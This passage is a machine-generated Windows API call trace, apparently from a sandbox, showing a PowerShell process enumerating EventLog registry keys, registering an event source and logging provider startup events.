	[0291.264] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.264] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.264] CoTaskMemFree (pv=0x206630) 
	[0291.265] CoTaskMemFree (pv=0x0) 
	[0291.265] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.265] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.265] CoTaskMemFree (pv=0x206630) 
	[0291.265] CoTaskMemFree (pv=0x0) 
	[0291.265] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.265] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.265] CoTaskMemFree (pv=0x206630) 
	[0291.265] CoTaskMemFree (pv=0x0) 
	[0291.265] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.265] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.265] CoTaskMemFree (pv=0x206630) 
	[0291.265] CoTaskMemFree (pv=0x0) 
	[0291.265] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.265] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.265] CoTaskMemFree (pv=0x206630) 
	[0291.265] CoTaskMemFree (pv=0x0) 
	[0291.266] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x350) returned 0x0
	[0291.266] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.266] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x354) returned 0x0
	[0291.266] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.266] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x358) returned 0x0
	[0291.266] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.266] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x35c) returned 0x0
	[0291.266] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.266] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x360) returned 0x0
	[0291.267] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.267] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x364) returned 0x0
	[0291.267] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.267] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x368) returned 0x0
	[0291.267] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.267] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x36c) returned 0x0
	[0291.267] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.267] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x370) returned 0x0
	[0291.267] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x374) returned 0x0
	[0291.268] RegCloseKey (hKey=0x374) returned 0x0
	[0291.268] RegCloseKey (hKey=0x34c) returned 0x0
	[0291.268] RegCloseKey (hKey=0x370) returned 0x0
	[0291.270] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d268 | out: phkResult=0x12d268*=0x370) returned 0x0
	[0291.271] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d1dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d1d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.271] CoTaskMemFree (pv=0x0) 
	[0291.271] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.271] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.271] CoTaskMemFree (pv=0x206630) 
	[0291.271] CoTaskMemFree (pv=0x0) 
	[0291.271] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.271] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.274] CoTaskMemFree (pv=0x206630) 
	[0291.274] CoTaskMemFree (pv=0x0) 
	[0291.274] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.274] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.274] CoTaskMemFree (pv=0x206630) 
	[0291.274] CoTaskMemFree (pv=0x0) 
	[0291.274] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.274] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.274] CoTaskMemFree (pv=0x206630) 
	[0291.274] CoTaskMemFree (pv=0x0) 
	[0291.274] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.274] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.274] CoTaskMemFree (pv=0x206630) 
	[0291.275] CoTaskMemFree (pv=0x0) 
	[0291.275] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.275] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.275] CoTaskMemFree (pv=0x206630) 
	[0291.275] CoTaskMemFree (pv=0x0) 
	[0291.275] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.275] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.275] CoTaskMemFree (pv=0x206630) 
	[0291.275] CoTaskMemFree (pv=0x0) 
	[0291.275] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.275] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.275] CoTaskMemFree (pv=0x206630) 
	[0291.275] CoTaskMemFree (pv=0x0) 
	[0291.275] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.275] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.276] CoTaskMemFree (pv=0x206630) 
	[0291.276] CoTaskMemFree (pv=0x0) 
	[0291.276] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x34c) returned 0x0
	[0291.276] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.276] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x374) returned 0x0
	[0291.276] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.276] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x378) returned 0x0
	[0291.276] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.277] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x37c) returned 0x0
	[0291.277] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.277] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x380) returned 0x0
	[0291.277] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.277] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x384) returned 0x0
	[0291.277] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.277] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x388) returned 0x0
	[0291.277] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.278] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x38c) returned 0x0
	[0291.278] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x0) returned 0x2
	[0291.278] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x390) returned 0x0
	[0291.278] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x394) returned 0x0
	[0291.278] RegCloseKey (hKey=0x394) returned 0x0
	[0291.278] RegCloseKey (hKey=0x370) returned 0x0
	[0291.279] RegCloseKey (hKey=0x390) returned 0x0
	[0291.281] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d238 | out: phkResult=0x12d238*=0x390) returned 0x0
	[0291.281] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d1ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d1a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d1ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d1a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.281] CoTaskMemFree (pv=0x0) 
	[0291.281] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.281] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x206630, lpcchName=0x12d238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.281] CoTaskMemFree (pv=0x206630) 
	[0291.281] CoTaskMemFree (pv=0x0) 
	[0291.281] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.281] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x206630, lpcchName=0x12d238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.282] CoTaskMemFree (pv=0x206630) 
	[0291.282] CoTaskMemFree (pv=0x0) 
	[0291.282] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.282] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x206630, lpcchName=0x12d238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.282] CoTaskMemFree (pv=0x206630) 
	[0291.282] CoTaskMemFree (pv=0x0) 
	[0291.282] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.282] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x206630, lpcchName=0x12d238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.282] CoTaskMemFree (pv=0x206630) 
	[0291.282] CoTaskMemFree (pv=0x0) 
	[0291.282] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.282] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x206630, lpcchName=0x12d238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.282] CoTaskMemFree (pv=0x206630) 
	[0291.282] CoTaskMemFree (pv=0x0) 
	[0291.282] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.282] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x206630, lpcchName=0x12d238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.283] CoTaskMemFree (pv=0x206630) 
	[0291.283] CoTaskMemFree (pv=0x0) 
	[0291.283] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.283] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x206630, lpcchName=0x12d238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.283] CoTaskMemFree (pv=0x206630) 
	[0291.283] CoTaskMemFree (pv=0x0) 
	[0291.283] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.283] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x206630, lpcchName=0x12d238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.283] CoTaskMemFree (pv=0x206630) 
	[0291.283] CoTaskMemFree (pv=0x0) 
	[0291.283] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.283] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x206630, lpcchName=0x12d238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.283] CoTaskMemFree (pv=0x206630) 
	[0291.283] CoTaskMemFree (pv=0x0) 
	[0291.283] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x370) returned 0x0
	[0291.284] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x0) returned 0x2
	[0291.284] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x394) returned 0x0
	[0291.284] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x0) returned 0x2
	[0291.284] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x398) returned 0x0
	[0291.284] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x0) returned 0x2
	[0291.284] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x39c) returned 0x0
	[0291.285] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x0) returned 0x2
	[0291.285] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x3a0) returned 0x0
	[0291.285] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x0) returned 0x2
	[0291.285] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x3a4) returned 0x0
	[0291.285] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x0) returned 0x2
	[0291.285] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x3a8) returned 0x0
	[0291.285] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x0) returned 0x2
	[0291.285] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x3ac) returned 0x0
	[0291.286] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x0) returned 0x2
	[0291.286] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x3b0) returned 0x0
	[0291.286] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x3b4) returned 0x0
	[0291.286] RegCloseKey (hKey=0x3b4) returned 0x0
	[0291.286] RegCloseKey (hKey=0x390) returned 0x0
	[0291.289] RegCloseKey (hKey=0x3b0) returned 0x0
	[0291.292] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba10008
	[0292.733] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32b0ab8*="WSMan", lpRawData=0x32b0828) returned 1
	[0292.752] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0292.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.753] CoTaskMemFree (pv=0x24c0b0) 
	[0292.776] CoTaskMemAlloc (cb=0x804) returned 0x1b8b6600
	[0292.776] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b6600, nSize=0x12d528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d528) returned 0x1
	[0292.776] CoTaskMemFree (pv=0x1b8b6600) 
	[0292.776] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0292.776] GetUserNameW (in: lpBuffer=0x206630, pcbBuffer=0x12d568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d568) returned 1
	[0292.776] CoTaskMemFree (pv=0x206630) 
	[0292.777] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eedd78*="Alias", lpRawData=0x2eedb08) returned 1
	[0292.952] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0292.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.952] CoTaskMemFree (pv=0x24c0b0) 
	[0292.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.954] CoTaskMemAlloc (cb=0x804) returned 0x1b8b6600
	[0292.954] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b6600, nSize=0x12d528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d528) returned 0x1
	[0292.954] CoTaskMemFree (pv=0x1b8b6600) 
	[0292.954] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0292.954] GetUserNameW (in: lpBuffer=0x206630, pcbBuffer=0x12d568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d568) returned 1
	[0292.955] CoTaskMemFree (pv=0x206630) 
	[0292.955] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ef3370*="Environment", lpRawData=0x2ef3100) returned 1
	[0292.956] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0292.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.957] CoTaskMemFree (pv=0x24c0b0) 
	[0292.958] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
